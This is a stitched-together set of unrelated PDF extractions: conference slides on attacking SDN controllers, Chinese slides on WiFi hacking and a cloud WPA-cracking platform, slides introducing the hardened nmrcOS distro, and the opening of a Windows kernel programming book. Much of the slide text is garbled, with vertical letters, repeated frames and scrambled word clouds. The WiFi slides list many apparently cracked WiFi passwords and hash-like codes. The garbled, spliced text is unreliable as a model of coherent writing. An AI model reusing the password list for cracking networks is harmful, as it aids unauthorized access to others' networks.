[1] exploitable if the target network is configured with in-band control.
[2] Switches are vulnerable to multiple remote attacks (e.g., Buffer Overflow[CVE-2016-2074]).
Attack Workflow
APP
APP
Service
Service
Routing
Link
Discovery
...
Service
Routing
Link
Discovery
...
O
P
E
N
F
L
O
W
N
E
T
C
O
N
F
O
V
S
D
B
Controller
Infrastructure
CPF Injection
Attack Workflow
APP
APP
Service
Service
Routing
Link
Discovery
...
Service
Routing
Link
Discovery
...
O
P
E
N
F
L
O
W
N
E
T
C
O
N
F
O
V
S
D
B
Controller
Infrastructure
CPF Injection
①
CPF delivery via legitimate
protocol interactions
Crafted
Protocol Message
Attack Workflow
APP
APP
Service
Service
Routing
Link
Discovery
...
Service
Routing
Link
Discovery
...
O
P
E
N
F
L
O
W
N
E
T
C
O
N
F
O
V
S
D
B
Controller
Infrastructure
CPF Injection
①
②
Payload transformation for
final exploitation
Payload in Form 1
CPF delivery via legitimate
protocol interactions
Crafted
Protocol Message
Attack Workflow
APP
APP
Service
Service
Routing
Link
Discovery
...
Service
Routing
Link
Discovery
...
O
P
E
N
F
L
O
W
N
E
T
C
O
N
F
O
V
S
D
B
Controller
Infrastructure
CPF Injection
①
③
Subvert SDN Controller
Payload in Form N
②
Payload transformation for
final exploitation
Payload in Form 1
CPF delivery via legitimate
protocol interactions
Crafted
Protocol Message
Hack Something Real!
Hack Something Real!
Hack Something Real!
Hack Something Real!
Hack Something Real!
Hack Something Real!
Hack Something Real!
Plaintext Key
Command
Execution
Path Traversal
XXE
XSS
Evaluation
5 popular SDN Controller
• Three open source projects (White-box)
• Two commercial products (Black-box)
54 apps
• Analyze 12 protocols
• Identify 476 dangerous function calls
19 zero-day vulnerabilities
• Construct 24 sophisticated exploit chains
Impact Analysis
Get System Shell (1 of them)
Execute Arbitray SDN Commands (5 of them)
Steal Confidential Data (7 of them)
Crash/Disrupt Service (11 of them)
0day Profile
Demo
ONOS Remote Command Execution
Conclusions
The first attack that can remotely compromise SDN software stack to
simultaneously cause multiple kinds of attack effects in SDN
controllers.
The data-plane-based attack surface is actually significantly larger
than what has been discovered.
Service-logic-free vulnerabilities in the controller could be exploited
in unexpected ways to conquer the difficulty brought in by pre-
defined protocol interactions.
Thanks!
Email : [email protected]
Homepage: http://fxiao.me
Twitter:
@f3ixiao | pdf |
大力出奇迹の
WiFi Hacking
杨
哲 (Longas)
ZerOne无线安全研究组织
ZerOne WirelessSec Research
SDR
LTE-‐FDD
RFID
WiFi
干扰
GSM
APPLICATION
SPEED INTERNET
能源
BLUETOOTH
ZigBee
OpenBSC
轨道交通
RESOURCE
LTE-‐FDD
Wireless
GPS
Infrared
NO
教育行业
车联网
GSM-‐R
LTE-‐HDD
民航
OpenBTS
电力行业
NFC
卫星通信
无线电
HackRF
交通
物联网
有源RFID
SOCIAL
无线电
BLOG
干扰
医疗
APPLICATION
SPEED
INTERNET
NEWS
SECRET
HackRF
移动互联网
轨道交通
RESOURCE
Wireless
GPS
Infrared
YES
NO
教育行业
车联网
GSM-‐R
LTE-‐HDD
民航
OpenBTS
电力行业
NFC
卫星通信
无线电
运营商
交通
物联网
有源RFID
IOT
BLOG
卫星通信
干扰
INTERNET
能源
NO
TELEVISION
TIME
IOT
CLOCK
DIGITAL
ADVERT
SMART
PHONE
EDUCATION
TALENT
PHONE
LTE-‐FDD
干扰
SPEED
INTERNET
能源
Infrared
教育行业
GSM-‐R
卫星通信
物联网
干扰
医疗
SPEED
INTERNET
能源
GPS
Infrared
YES
NO
教育行业
车联网
GSM-‐R
LTE-‐HDD
电力行业
交通
物联网
有源RFID
IOT
TALENT
Wireless
CLOCK
YES
NO
车联网
NFC
有源RFID
BLOG
卫星通信
无线电
干扰
INTERNET
DIGITAL
INFORMATION
SECRET
铁路
KNOWLEDGE
LTE-‐FDD
干扰
SPEED
INTERNET
能源
Infrared
教育行业
GSM-‐R
卫星通信
物联网
干扰
医疗
SPEED
INTERNET
能源 GPS
Infrared
YES
NO
DEVELOPMENT
车联网
GSM-‐R
LTE-‐HDD
电力行业
交通
物联网
有源RFID
IOT
TALENT
Wireless
CLOCK
YES
NO
车联网
NFC
有源RFID
BLOG
卫星通信
无线电
干扰
INTERNET
DIGITAL
INFORMATION
SECRET
铁路
KNOWLEDGE
LTE-‐FDD
教育行业
GSM-‐R
TALENT
Wireless
CLOCK
YES
NO
车联网
NFC
有源RFID
BLOG
卫星通信
无线电
干扰
INTERNET
DIGITAL
INFORMATION
SECRET
INTERNET
车联网 交通
LTE-‐FDD
LANGUAGE
INTERFACE
HackRF
• Crack WPA
• Pentest over WiFi
• Fake AP
• Air-Capture
• MITM
• WAP Tunnel
• WAPJack
• WIDS / WIPS/Hotspot
• Deauth/Auth/Disco
• WiFiphisher
12只
猴子
空口监听
FakeAP
内网渗透
WAPJack
MITM
Deauth
85%
案例
聚焦
我去
WPA
密码
!!!!!
• Dictionary
• WPA PMK Hash
• WPS Online / Offline
• Distributed
• GPU
• Cloud
Crack
#主流
用户
云平台
运算节点
运算结果返回
上传
握⼿手包
指派
任务
{反物质}无线安全评估云平台
新平台
发布
初始
界面
300
40,000,000,000,000
组合
3,000
样本
日夜
3
公测
几个
数字
TEXTTEXT
6666688888
APPLICATION
SPEED
windgame
susan1003
8888899999
a=b?c:d;;
110110110
wang1104
wine888999
46958820
34238817
ECONOMIC
19830405
12345679
123454321
TOWERFUL
46958820
GREENLEAF
FOLLOWME
zxcvbnm67989989
52331314
11759000
wangkang
62518915
62518913
xa_123456!
1234554321
zhangjianguo
82729336
87654321
88776655
TEXT
RISK
APPLICATION
windgame
19751023
01234567
ying123456
wireless123
11112222
RESOURCE
34238817
ying12345
02961756
12345679
1234567890123
TOWER
62315659
zhouyuer
52890301
IMPROVE2
11759000
1122334455
sakurasakura
linyulong
123456789
NETWORK
87654321
BLOGBLOG
qazwsxedc
HELLOWORLD
windgame
DATADATA
10000008
watashiwa
once0822
88990102
11223344
ADVERT
qwerasdf
0127h0p0d
tanglaoban
TALENT
liujiejie
34238817
REDCLOCK
12345679
TOWER1234
NETWORK123
11112222
IHATEYOU
33445566
3344rrff
windgame
DIGITAL
INFORMATION
SECRET123
12345678
1qazxsw2
zxm19860412
aaron123
LYP82NLF
DEPPON%2B*%40147
1z2x3k4l5q6y
ACC2C7AHSU
词根
?!
运算
界面
Num
邀请码
free.wpapass.com
01
7659215ecbb8977597ad913e0f2247af
02
53c555d033c8c6a7eb759d902531b5cc
03
b78783e5171416ecbbc623260e0c5a32
04
eec71f550ce81e6a69294c8f7a7e6784
05
76f429c136532587af08f3a3399a9a3b
应用
领域
内部安检 安全评估
无线渗透 边界防护
家庭防窥 隔壁老王
邻家妹纸
RP分割线
小区鲜肉
那些
前浪
平台名称
支持
WPA
1/2
支持
cap
文件
上传
支持
hccap
文件
上传
自动
提取
SSID
支持
中文
SSID
支持
多
SSID
自定
义
任务
名
任务
暂停/
恢复
用户
自行
指定
字典
字
典
分
级
历史
破解
任务
浏览
支持
外部
API
1 AntiMatter
√
√
√
√
√
√
√
√
√
√
2 GPUHASH
√
√
√
√
√
3 Cloud
Cracker
√
√
√
√
√
4 HashCrack
√
√
√
√
√
5 HashBreak
√
√
√
√
6 Online
HashCrack
√
√
√
√
7 darkircop
√
√
√
Amazing
Race
邀请制
发布API
e.g.:
跟踪发布
国内WiFi
安全报告
成果发布
新模块
安全
行业
对接
升级
e.g.:
支持Kali
NetHunter
开源硬件
贡献
模式
联盟
模式
有趣
的…
杨 哲
(Longas)
ZerOne无线安全研究组织
[email protected]
Thanks !! | pdf |
Introducing nmrcOS
Inertia <[email protected]>
Scope
Hackers
System administrators
Distro builders
Overall goals for the project
Stable, secure, trusted system
Intended users
Intended uses
History of the Project
Initial approach
Analysis of problems
Solution
How nmrcOS changed to solve these problems
Rationale for these choices
Noted Features of nmrcOS
Debian based OS (easy to install, supports most hardware)
Kernel mods
Customized apps
Kernel
Linux 2.2.25
Openwall kernel patch (overflow protection, etc)
HAP Linux kernel patch (better chroot, extra logging, etc)
Trusted path enforced in kernel
Random IP Ids
Modified Applications
Customized Pine 4.56
Sendmail 8.12.9
Why we chose it, and why we rebuilt and used "unstable”
Bastille Linux auto-loaded and ran by default
Other Features
Installs and boots up in a locked-down state
Host and network based intrusion detection included
Includes many security, encryption and privacy tools
Demonstration of nmrcOS
Live demo of the installation procedure
Configuration of nmrcOS
How to maintain/upgrade an nmrcOS system
Developing for nmrcOS
Creating a non-kernel package
Creating a kernel package
Distributing your package
Creating your own distro based on nmrcOS
Future of nmrcOS
Plans for future revisions of the system
Questions and Followup
http://nmrcos.nmrc.org/
Inertia <[email protected]> | pdf |
Windows Kernel Programming, Second Edition
Pavel Yosifovich
This book is for sale at http://leanpub.com/windowskernelprogrammingsecondedition
This version was published on 2022-01-22
This is a Leanpub book. Leanpub empowers authors and publishers with the Lean Publishing process.
Lean Publishing is the act of publishing an in-progress ebook using lightweight tools and many iterations
to get reader feedback, pivot until you have the right book and build traction once you do.
© 2020 - 2022 Pavel Yosifovich
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
Who Should Read This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
What You Should Know to Use This Book
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
Book Contents
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
Sample Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
2
Chapter 1: Windows Internals Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
Virtual Memory
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5
Page States . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7
System Memory
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7
Threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
8
Thread Stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
9
System Services (a.k.a. System Calls) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
11
General System Architecture
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
13
Handles and Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
15
Object Names . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
16
Accessing Existing Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
19
Chapter 2: Getting Started with Kernel Development . . . . . . . . . . . . . . . . . . . . . . . .
22
Installing the Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
22
Creating a Driver Project . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
23
The DriverEntry and Unload Routines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
24
Deploying the Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
26
Simple Tracing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
29
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
32
Chapter 3: Kernel Programming Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
33
General Kernel Programming Guidelines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
33
Unhandled Exceptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
34
Termination . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
34
Function Return Values
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
35
IRQL
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
35
C++ Usage
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
35
Testing and Debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
36
Debug vs. Release Builds . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
37
CONTENTS
The Kernel API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
37
Functions and Error Codes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
38
Strings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
39
Dynamic Memory Allocation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
41
Linked Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
43
The Driver Object
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
45
Object Attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
46
Device Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
50
Opening Devices Directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
52
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
55
Chapter 4: Driver from Start to Finish
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
56
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
56
Driver Initialization
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
57
Passing Information to the Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
59
Client / Driver Communication Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . .
60
Creating the Device Object
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
60
Client Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
63
The Create and Close Dispatch Routines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
65
The Write Dispatch Routine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
66
Installing and Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
70
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
74
Chapter 5: Debugging and Tracing
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
75
Debugging Tools for Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
75
Introduction to WinDbg . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
76
Tutorial: User mode debugging basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
77
Kernel Debugging
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
94
Local Kernel Debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
94
Local kernel Debugging Tutorial
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
96
Full Kernel Debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
104
Using a Virtual Serial Port . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
104
Using the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
108
Kernel Driver Debugging Tutorial . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
109
Asserts and Tracing
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
114
Asserts
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
114
Extended DbgPrint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
116
Other Debugging Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
121
Trace Logging
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
122
Viewing ETW Traces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
125
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
130
Chapter 6: Kernel Mechanisms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
131
Interrupt Request Level (IRQL)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
131
Raising and Lowering IRQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
134
Thread Priorities vs. IRQLs
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
135
CONTENTS
Deferred Procedure Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
135
Using DPC with a Timer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
138
Asynchronous Procedure Calls
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
139
Critical Regions and Guarded Regions
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
140
Structured Exception Handling
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
140
Using __try/__except
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
142
Using __try/__finally . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
144
Using C++ RAII Instead of __try / __finally
. . . . . . . . . . . . . . . . . . . . . . .
146
System Crash . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
148
Crash Dump Information
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
150
Analyzing a Dump File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
154
System Hang . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
157
Thread Synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
159
Interlocked Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
159
Dispatcher Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
161
Mutex . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
163
Fast Mutex . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
169
Semaphore . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
169
Event . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
170
Named Events
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
171
Executive Resource . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
173
High IRQL Synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
175
The Spin Lock
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
177
Queued Spin Locks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
180
Work Items . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
181
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
183
Chapter 7: The I/O Request Packet
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
184
Introduction to IRPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
184
Device Nodes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
185
IRP Flow
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
189
IRP and I/O Stack Location
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
190
Viewing IRP Information
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
193
Dispatch Routines
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
197
Completing a Request . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
198
Accessing User Buffers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
199
Buffered I/O
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
200
Direct I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
204
User Buffers for IRP_MJ_DEVICE_CONTROL
. . . . . . . . . . . . . . . . . . . . . . . . .
209
Putting it All Together: The Zero Driver
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
211
Using a Precompiled Header . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
212
The DriverEntry Routine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
214
The Create and Close Dispatch Routines . . . . . . . . . . . . . . . . . . . . . . . . . . . .
216
The Read Dispatch Routine
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
216
The Write Dispatch Routine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
217
Test Application
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
218
CONTENTS
Read/Write Statistics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
219
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
223
Chapter 8: Advanced Programming Techniques (Part 1) . . . . . . . . . . . . . . . . . . . . . .
224
Driver Created Threads
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
224
Memory Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
226
Pool Allocations
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
226
Secure Pools
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
229
Overloading the new and delete Operators . . . . . . . . . . . . . . . . . . . . . . . . . .
230
Lookaside Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
233
The “Classic” Lookaside API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
233
The Newer Lookaside API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
235
Calling Other Drivers
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
237
Putting it All Together: The Melody Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
239
Client Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
255
Invoking System Services
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
256
Example: Enumerating Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
258
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
261
Chapter 9: Process and Thread Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
262
Process Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
262
Implementing Process Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
265
The DriverEntry Routine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
269
Handling Process Exit Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
271
Handling Process Create Notifications
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
274
Providing Data to User Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
277
The User Mode Client . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
280
Thread Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
283
Image Load Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
286
Final Client Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
293
Remote Thread Detection
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
296
The Detector Client
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
305
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
306
Introduction
Windows kernel programming is considered by many a dark art, available to select few that manage to
somehow unlock the mysteries of the Windows kernel. Kernel development, however, is no different than
user-mode development, at least in general terms. In both cases, a good understanding of the platform is
essential for producing high quality code.
The book is a guide to programming within the Windows kernel, using the well-known Visual Studio
integrated development environment (IDE). This environment is familiar to many developers in the
Microsoft space, so that the learning curve is restricted to kernel understanding, coding and debugging,
with less friction from the development tools.
The book targets software device drivers, a term I use to refer to drivers that do not deal with hardware.
Software kernel drivers have full access to the kernel, allowing these to perform any operation allowed by
the kernel. Some software drivers are more specific, such as file system mini filters, also described in the
book.
Who Should Read This Book
The book is intended for software developers that target the Windows kernel, and need to write kernel
drivers to achieve their goals. Common scenarios where kernel drivers are employed are in the Cyber
Security space, where kernel drivers are the chief mechanism to get notified of important events, with the
power to intercept certain operations. The book uses C and C++ for code examples, as the kernel API is all
C. C++ is used where it makes sense, where its advantages are obvious in terms of maintenance, clarity,
resource management, or any combination of these. The book does not use complex C++ constructs, such
as template metaprogramming. The book is not about C++, it’s about Windows kernel drivers.
What You Should Know to Use This Book
Readers should be very comfortable with the C programming language, especially with pointers, structures,
and its standard library, as these occur very frequently when working with kernel APIs. Basic C++
knowledge is highly recommended, although it is possible to traverse the book with C proficiency only.
Book Contents
Here is a quick rundown of the chapters in the book:
• Chapter 1 (“Windows Internals Overview) provides the fundamentals of the internal workings of
the Windows OS at a high level, enough to get the fundamentals without being bogged down by
too many details.
Introduction
2
• Chapter 2 (“Getting Started with Kernel Development”) describes the tools and procedures needed
to set up a development environment for developing kernel drivers. A very simple driver is created
to make sure all the tools and procedures are working correctly.
• Chapter 3 (“Kernel Programming Basics) looks at the fundamentals of writing drivers, including
bssic kernel APIs, handling of common programming tasks involving strings, linked lists, dynamic
memory allocations, and more.
• Chapter 4 (“Driver from Start to Finish”) shows how to build a complete driver that performs some
useful functionality, along with a client application to drive it.
If you are new to Windows kernel development, you should read chapters 1 to 7 in order. Chapter 8 contains
some advanced material you may want to go back to after you have built a few simple drivers. Chapters
9 onward describe specialized techniques, and in theory at least, can be read in any order.
Sample Code
All the sample code from the book is freely available on the book’s Github repository at https://github.
com/zodiacon/windowskernelprogrammingbook2e. Updates to the code samples will be pushed to this
repository. It’s recommended the reader clone the repository to the local machine, so it’s easy to experiment
with the code directly.
All code samples have been compiled with Visual Studio 2019. It’s possible to compile most code samples
with earlier versions of Visual Studio if desired. There might be few features of the latest C++ standards
that may not be supported in earlier versions, but these should be easy to fix.
Happy reading!
Pavel Yosifovich
June 2022
Chapter 1: Windows Internals Overview
This chapter describes the most important concepts in the internal workings of Windows. Some of the
topics will be described in greater detail later in the book, where it’s closely related to the topic at hand.
Make sure you understand the concepts in this chapter, as these make the foundations upon any driver
and even user mode low-level code, is built.
In this chapter:
• Processes
• Virtual Memory
• Threads
• System Services
• System Architecture
• Handles and Objects
Processes
A process is a containment and management object that represents a running instance of a program. The
term “process runs” which is used fairly often, is inaccurate. Processes don’t run – processes manage.
Threads are the ones that execute code and technically run. From a high-level perspective, a process owns
the following:
• An executable program, which contains the initial code and data used to execute code within the
process. This is true for most processes, but some special ones don’t have an executable image
(created directly by the kernel).
• A private virtual address space, used for allocating memory for whatever purposes the code within
the process needs it.
• An access token (called primary token), which is an object that stores the security context of the
process, used by threads executing in the process (unless a thread assumes a different token by using
impersonation).
• A private handle table to executive objects, such as events, semaphores, and files.
• One or more threads of execution. A normal user-mode process is created with one thread (executing
the classic main/WinMain function). A user mode process without threads is mostly useless, and
under normal circumstances will be destroyed by the kernel.
Chapter 1: Windows Internals Overview
4
These elements of a process are depicted in figure 1-1.
Figure 1-1: Important ingredients of a process
A process is uniquely identified by its Process ID, which remains unique as long as the kernel process object
exists. Once it’s destroyed, the same ID may be reused for new processes. It’s important to realize that the
executable file itself is not a unique identifier of a process. For example, there may be five instances of
notepad.exe running at the same time. Each of these Notepad instances has its own address space, threads,
handle table, process ID, etc. All those five processes are using the same image file (notepad.exe) as their
initial code and data. Figure 1-2 shows a screenshot of Task Manager’s Details tab showing five instances
of Notepad.exe, each with its own attributes.
Chapter 1: Windows Internals Overview
5
Figure 1-2: Five instances of notepad
Virtual Memory
Every process has its own virtual, private, linear address space. This address space starts out empty (or
close to empty, since the executable image and NtDll.Dll are the first to be mapped, followed by more
subsystem DLLs). Once execution of the main (first) thread begins, memory is likely to be allocated, more
DLLs loaded, etc. This address space is private, which means other processes cannot access it directly.
The address space range starts at zero (technically the first and last 64KB of the address space cannot be
committed), and goes all the way to a maximum which depends on the process “bitness” (32 or 64 bit) and
the operating system “bitness” as follows:
• For 32-bit processes on 32-bit Windows systems, the process address space size is 2 GB by default.
• For 32-bit processes on 32-bit Windows systems that use the increase user virtual address space
setting, can be configured to have up to 3GB of address space per process. To get the extended
address space, the executable from which the process was created must have been marked with the
LARGEADDRESSAWARE linker flag in its PE header. If it was not, it would still be limited to 2 GB.
• For 64-bit processes (on a 64-bit Windows system, naturally), the address space size is 8 TB (Windows
8 and earlier) or 128 TB (Windows 8.1 and later).
• For 32-bit processes on a 64-bit Windows system, the address space size is 4 GB if the executable
image has the LARGEADDRESSAWARE flag in its PE header. Otherwise, the size remains at 2 GB.
The requirement of the LARGEADDRESSAWARE flag stems from the fact that a 2 GB address
range requires 31 bits only, leaving the most significant bit (MSB) free for application use.
Specifying this flag indicates that the program is not using bit 31 for anything and so having
